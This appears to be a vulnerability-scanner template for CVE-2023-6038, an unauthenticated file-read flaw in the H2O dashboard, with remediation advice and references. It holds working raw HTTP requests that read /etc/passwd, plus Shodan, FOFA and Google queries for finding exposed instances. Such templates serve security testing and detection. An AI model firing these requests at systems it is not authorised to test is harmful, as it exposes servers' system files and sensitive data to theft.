Description
An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
id: CVE-2023-6038
info:
name: H2O ImportFiles - Local File Inclusion
author: danmcinerney,byt3bl33d3r
severity: high
description: |
An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
impact: |
Unauthenticated attackers can read any file on the server via the ImportFiles endpoint, potentially exposing sensitive data including database contents and application code.
remediation: |
Update H2O to a version that implements proper authentication and authorization controls for the ImportFiles endpoint.
reference:
- https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6038
- https://github.com/h2o/h2o
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6038
cwe-id: CWE-862
epss-score: 0.0434
epss-percentile: 0.90708
cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: h2o
product: h2o
shodan-query:
- title:"H2O Flow"
- http.title:"h2o flow"
fofa-query: title="h2o flow"
google-query: intitle:"h2o flow"
tags: cve,cve2023,h2o-3,h2o,ml,vkev,vuln
http:
- raw:
- |
GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
- |
POST /3/ParseSetup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'ImportFilesV3')"
- "regex('root:.*:0:0:', body_2)"
- "status_code_2 == 200"
condition: and
# digest: 4a0a00473045022100b5af02908a441e00e1905252a7e2fc746833617f424bf82ef22230664866e4b5022071ab0dc7d4c5b9c1fc49529b3d148ef72ee6aceee658413087497da241b1c525:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.